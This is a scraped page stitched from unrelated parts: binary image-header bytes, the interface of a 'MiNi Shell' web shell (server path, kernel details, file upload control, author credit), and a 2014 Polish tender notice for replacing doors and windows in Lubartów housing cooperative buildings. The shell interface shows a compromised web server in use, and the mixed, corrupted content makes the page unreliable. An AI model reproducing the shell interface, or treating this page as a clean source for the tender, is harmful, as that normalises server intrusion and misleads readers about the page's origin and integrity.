JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140808/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140808/266032-N-2014.html

<p class="kh_header"><b>Lubartów: Wymiana drzwi stalowych na aluminiowe w budynkach mieszkalnych Cicha 3, 7 i 15A, Orlicz-Dreszera 12, Lubelska 63, Powst. W-wy 3 oraz stolarki okiennej i drzwiowej w budynku usługowym przy ul. Cichej 1, będących w zasobach Spółdzielni Mieszkaniowej w Lubartowie</b><br>
<b>Numer ogłoszenia: 266032 - 2014; data zamieszczenia: 08.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółdzielnia Mieszkaniowa w Lubartowie , ul. Cicha 6, 21-100 Lubartów, woj. lubelskie, tel. 081 463 90 01, faks 081 855 30 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.smlubartow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółdzielnia Mieszkaniowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana drzwi stalowych na aluminiowe w budynkach mieszkalnych Cicha 3, 7 i 15A, Orlicz-Dreszera 12, Lubelska 63, Powst. W-wy 3 oraz stolarki okiennej i drzwiowej w budynku usługowym przy ul. Cichej 1, będących w zasobach Spółdzielni Mieszkaniowej w Lubartowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wymiana drzwi stalowych na aluminiowe w budynkach
mieszkalnych Cicha 3, 7 i 15A, Orlicz-Dreszera 12, Lubelska 63, Powst. W-wy 3 oraz stolarki
okiennej i drzwiowej w budynku usługowym przy ul. Cichej 1, będących w zasobach Spółdzielni
Mieszkaniowej w Lubartowie.
Przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV):
45.42.10.00-4 Roboty w zakresie stolarki budowlanej
Przedmiot zamówienia obejmuje dwa zadania:
Zadanie I - Wymiana wewnętrznych drzwi wejściowych i naświetli w klatkach schodowych
budynków mieszkalnych będących w zasobach Spółdzielni Mieszkaniowej w Lubartowie.
Wymiana dotyczy budynków:
Zakres przedmiotu zamówienia dla Zadania I
Czynności do wykonania przy wymianie stolarki drzwiowej i naświetli:
1. dostawa nowych drzwi wewnętrznych do budynków AL (tzw. ciepły profil, naświetla bez uchyłu),
2. demontaż i utylizacja starych drzwi i naświetli,
3. montaż nowych drzwi z klamkami - drzwi i naświetla montować na kotwy systemowe z
uszczelnieniem ich pianką poliuretanową,
4. zabezpieczenie powierzchni stolarki drzwiowej i naświetli taśmą i folią malarską przed robotami
związanymi z wykończeniem powierzchni ościeży zewnętrznych i wewnętrznych
2
Tabela Nr 1
Budynki mieszkalne drzwi naświetle
Adres budynku wymiary ilość wymiary ilość
Cicha 3 220 100 4 80 35 4
Cicha 7 220 100 4 80 35 4
Cicha 15 A 221 180 1
Orlicz-Dreszera 12 205 98 2 70 30 2
Lubelska 63 207 117 3
Powst. W-wy 3 211 100 2 80 30 2
RAZEM 16 12
5. przycięcie rozprężonej i suchej pianki poliuretanowej
6. wykończenie ościeży/glify wewnętrznych i zewnętrznych gotowymi zaprawami tynkarskimi
zgodnie ze stanem istniejącym,
7. niezbędne prace malarskie ścian i sufitów w kolorach istniejących,
8. regulacja okuć stolarki drzwiowej
9. montaż w drzwiach samozamykaczy
10. montaż odbojów przy wszystkich montowanych drzwiach
11. porządkowanie terenu
Okna/drzwi przewidziane do wymiany posiadają niżej wymienione wymiary w cm (wymiary
orientacyjne) służą na potrzeby oszacowania ceny ofertowej (muszą zostać zweryfikowane przez
oferenta przed złożeniem oferty) - wymiary okien/drzwi montowanych w ramach zamówienia zostaną
zweryfikowane z rzeczywistym ich obmiarem.
Wymagania stolarki drzwiowej i naświetli dla Zadania I:
- materiał ramy drzwi wewnętrznych i naświetla oraz ramy okiennej -AL (ciepły profil)
- współczynnik przenikania ciepła dla całych drzwi U<= 2,0 W/m2 K, naświetli U <= 2,0 W/m2 K,
- stolarka winna posiadać atest PZH
- pakiet szybowy jednokomorowy U<=1,1 W/m2K
- kolor profili drzwiowych i naświetli -ciemny brąz,
- szerokość profilu ma wynosić nie mniej jak 68 mm dla stolarki drzwiowej i naświetli
- sposób otwierania drzwi - jednoskrzydłowe,
- drzwi wyposażone w samozamykacz,
- okucia wykonane w technologii odpornej na korozję
Zastosowane materiały muszą być udokumentowane kartą techniczną materiału, atestem higienicznym
i aprobatą techniczną lub deklaracją zgodności.
Wykonawca zobowiązany jest do udzielenia gwarancji jakości na wykonane roboty na okres nie
krótszy niż 60 miesięcy. W przypadku nie wypełniania przez Wykonawcę w formularzu
ofertowym pola określającego długość okresu gwarancji będzie to równoznaczne z udzieleniem
gwarancji na okres 60 m-cy. Oferta z niewypełnionym polem długości okresu udzielanej
gwarancji, o której mowa w zdaniu poprzednim będzie traktowana jako ważna nie podlegająca
odrzuceniu i zostanie poddana ocenie pod warunkiem, iż nie będzie innych powodów
skutkujących odrzuceniem takiej oferty lub wykluczeniem Wykonawcy.
3
Zadanie II - Wymiana stolarki okiennej i drzwiowej w budynku usługowym przy ul. Cichej 1 w
Lubartowie.
Zakres przedmiotu zamówienia dla Zadania II
Czynności do wykonania przy wymianie stolarki drzwiowej i stolarki okiennej:
1. dostawa nowych drzwi zewnętrznych do budynku AL ( tzw. ciepły profil), wewnętrznych AL ( tzw.
zimny profil)
2. dostawa nowych okien z PCV
3. demontaż i utylizacja starych drzwi i okien,
4. montaż nowych drzwi z dużym pochwytem - drzwi i okna montować na kotwy systemowe z
uszczelnieniem ich pianką poliuretanową,
5. montaż nowych okien wraz z klamkami - okna montować na kotwy systemowe z uszczelnieniem
ich pianką poliuretanową,
4
Cicha 1 Tabela Nr 2
Okna
Lp typ wymiary ilość Uwagi
1 293 179 5
2 293 87 2
3 305 87 1
4 293 87 3
5 176 140 1
6 Okno PCV 305 87 1
7 Okno PCV 176 140 1
8 Okno PCV 122 87 1
9 Okno PCV 226 122 1
Razem 16
Drzwi
typ wymiary ilość Uwagi
1 226 160 1
2 aluminium 226 160 1
3 Stalowe pełne 250 130 1
Razem 3
Okno PCV
profil ciepły
Podział pionowy na 3 równe części, bez
otwierania
Okno PCV
profil ciepły
Podział pionowy na 2 równe części, bez
otwierania
Okno PCV
profil ciepły
Podział pionowy na 2 równe części, bez
otwierania
Okno PCV
profil ciepły
Podział pionowy na 2 równe części, z możliwością
uchylenia jednej części
Okno PCV
profil ciepły
Podział poziomy - od dołu 50 cm pakiet
nieprzezierny, pozostała część podział pionowy
symetryczny, bez otwierania
Podział pionowy na 2 równe części profil
zimny, bez otwierania
profil zimny, pakiet szybowy, podział pionowy
symetryczny, bez otweierania
profil zimny, pakiet szybowy, bez otwierania
profil zimny, pakiet nieprzezierny, podział
poziomy symetryczny, bez otwierania
aluminium,
profil ciepły
dwuskrzydłowe, niesymetryczne (w świetle
min 140 x 210)
dwuskrzydłowe, niesymetryczne (w świetle
min 140 x 210), profil zimny
do rampy towarowej, w świetle min. 120 x
220
6. zabezpieczenie powierzchni stolarki drzwiowej i stolarki okiennej taśmą i folią malarską przed
robotami związanymi z wykończeniem powierzchni ościeży zewnętrznych i wewnętrznych
7. przycięcie rozprężonej i suchej pianki poliuretanowej
8. wykończenie ościeży/glify wewnętrznych i zewnętrznych gotowymi zaprawami tynkarskimi
zgodnie ze stanem istniejącym,
9. w razie potrzeby montaż i demontaż istniejących parapetów wewnętrznych i zewnętrznych (z
blachy),
10. niezbędne prace malarskie ścian i sufitów w kolorach istniejących,
11. regulacja okuć stolarki drzwiowej i stolarki okiennej
12. montaż w drzwiach samozamykaczy z blokadą pozycji otwartej, montaż po jednej dodatkowej
sztuce dla każdych drzwi dodatkowych zamków ( zamki powinny posiadać klasę odporności na
włamanie -kategorii C wg PN)
13. montaż odbojów przy wszystkich montowanych drzwiach
14. porządkowanie terenu
Okna/drzwi przewidziane do wymiany posiadają niżej wymienione wymiary w cm (wymiary
orientacyjne) służą na potrzeby oszacowania ceny ofertowej (muszą zostać zweryfikowane przez
oferenta przed złożeniem oferty) - wymiary okien/drzwi montowanych w ramach zamówienia zostaną
zweryfikowane z rzeczywistym ich obmiarem:
Wymagania stolarki drzwiowej AL i okiennej z PCV - dla Zadania II:
Drzwi:
- materiał ramy drzwi zewnętrznych - AL (ciepły profil)
- materiał ramy drzwi wewnętrznych - AL (zimny profil)
- współczynnik przenikania ciepła dla całych drzwi zewn. U<= 2,0 W/m2 K,
- stolarka winna posiadać atest PZH
- pakiet szybowy jednokomorowy U<=1,1 W/m2K
- pakiet szybowy dla okien i drzwi ciepłych - od strony zewnętrznej szyba antywłamaniowa P4, od
strony wewnętrznej szyba bezpieczna,
- kolor profili drzwiowych - biały,
- szerokość profilu ma wynosić nie mniej jak 68 mm,
- sposób otwierania drzwi - dwuskrzydłowe, niesymetryczne, otwierana szersza część,
- drzwi wyposażone w samozamykacz z blokadą pozycji otwartej, montaż po jednej dodatkowej sztuce
dla każdych drzwi dodatkowych zamków (zamki powinny posiadać klasę odporności na włamanie -
kategorii C wg PN)
-okucia wykonane w technologii odpornej na korozję
Okna:
- materiał ramy okiennej - PCV
- współczynnik przenikania ciepła dla całego okna zewnętrznego U <= 2,0W/m2K,
- kolor profili okiennych - biały
-stolarka winna posiadać atest PZH
-pakiet szybowy jednokomorowy U<=1,1 W/m2K,
-pakiet szybowy dla okien ciepłych - od strony zewnętrznej szyba antywłamaniowa P4, od strony
wewnętrznej szyba bezpieczna
-profile zewnętrzne powinny być odporne na promienie UV,
-szerokość profilu ma wynosić nie mnie jak 68 mm,
- okna uchylne (U) wyposażone w nożyce z możliwością wypięcia i uchylenia skrzydła do 180
-okucia wykonane w technologii odpornej na korozję
-nie dopuszcza się profili wyprodukowanej w technologii koekstruzji z wykorzystaniem granulatu z
odzysku
5
Zastosowane materiały muszą być udokumentowane kartą techniczną materiału, atestem higienicznym
i aprobatą techniczną lub deklaracją zgodności.
Drzwi od zaplecza:
- materiał ramy drzwi od zaplecza stal (ciepły profil) i aprobatą techniczną lub deklaracją zgodności.
Wykonawca zobowiązany jest do udzielenia gwarancji jakości na wykonane roboty na okres nie
krótszy niż 60 miesięcy. W przypadku nie wypełniania przez Wykonawcę w formularzu
ofertowym pola określającego długość okresu gwarancji będzie to równoznaczne z udzieleniem
gwarancji na okres 60 m-cy. Oferta z niewypełnionym polem długości okresu udzielanej
gwarancji, o której mowa w zdaniu poprzednim będzie traktowana jako ważna nie podlegająca
odrzuceniu i zostanie poddana ocenie pod warunkiem, iż nie będzie innych powodów
skutkujących odrzuceniem takiej oferty lub wykluczeniem Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia przez Wykonawców wadium. Wykonawca przed upływem
terminu składania ofert zobowiązany jest wnieść wadium w wysokości 2 000 zł dla Zadania I i 2
000 dla Zadania II, odrębnie w odniesieniu do każdej z części zamówienia, na którą składa
ofertę.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym
że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych
5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2 ustawy z dnia
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007 r. Nr.
42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr.96, poz. 620).
3.Wadium wniesione w pieniądzu wpłaca się na rachunek bankowy Zamawiającego przelewem. Nr
rachunku: PKO BP S.A. O/ Lubartów nr 57 1020 3206 0000 8402 0004 4255 z dopiskiem na
przelewie Wadium na wymianę stolarki w SM w Lubartowie Zadanie I/Zadanie II. O jego
wniesieniu w terminie decydować będzie data wpływu na podany wyżej rachunek bankowy
Zamawiającego.
Zamawiający wymaga, aby w przypadku wniesienia wadium w formie:
- pieniężnej dokument potwierdzający wpłatę wadium został dołączony do oferty,
- innej niż pieniądz, oryginał dokumentu został złożony w ofercie.
4. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej
lub zamknięcia postępowania bez dokonania wyboru oferty, z wyjątkiem Wykonawcy,
którego oferta została wybrana jako najkorzystniejsza.
5. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium
niezwłocznie po zawarciu umowy w sprawie zamówienia oraz wniesieniu zabezpieczenia należytego
wykonania umowy, jeżeli jego wniesienia żądano.
6. Zamawiający niezwłocznie zwraca wadium na wniosek Wykonawcy, który wycofał ofertę przed
upływem terminu składania ofert.
7. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je pomniejszone o koszty prowizji
bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę (Wykonawca
poda w ofercie numer konta na które należy zwrócić wadium wpłacone w formie pieniądza).
8. Zamawiający zatrzymuje wadium, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia stało się niemożliwe z przyczyn leżących po stronie
Wykonawcy.
8</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnieniu warunków udziału w postępowaniu zał. nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy z wykorzystaniem wzoru zał. nr 1 do SIWZ.
2. Dokument potwierdzający wpłatę wadium.
3. Oświadczenie o akceptacji warunków przetargu zał. nr 2 do SIWZ.

5. Wykaz robót budowlanych potwierdzonych dołączonymi referencjami zał. nr 4 do SIWZ
6. Oświadczenie o braku podstaw do wykluczenia zał. nr 5 do SIWZ
7. Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest
ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z
przedmiotem zamówienia. W przypadku gdy polisa zawarta jest na okres krótszy niż czas realizacji
zamówienia, Wykonawca zobowiązany jest niezwłocznie dostarczyć polisę ubezpieczenia OC na
kolejne okresy obejmujące łącznie czas realizacji zamówienia.
8. Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania
braku podstaw do wykluczenia z postępowania w postaci otwarcia wobec wykonawcy likwidacji lub
ogłoszenia upadłości, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ
zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia
wierzycieli przez likwidację majątku upadłego - wystawiony nie wcześniej niż 6 miesięcy przed
upływem terminu składania ofert.
9. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca
nie zalega z opłaceniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie,
odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji
właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania
wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
10. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy
Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem
składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie całości wykonania
decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu
składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo
składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Udzielona gwarancja na roboty - 5</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.smlubartow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spółdzielnia Mieszkaniowa w Lubartowie, 21-100 Lubartów, pokój nr 7..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2014 godzina 11:00, miejsce: Spółdzielnia Mieszkaniowa w Lubartowie, 21-100 Lubartów, pokój Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze Środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com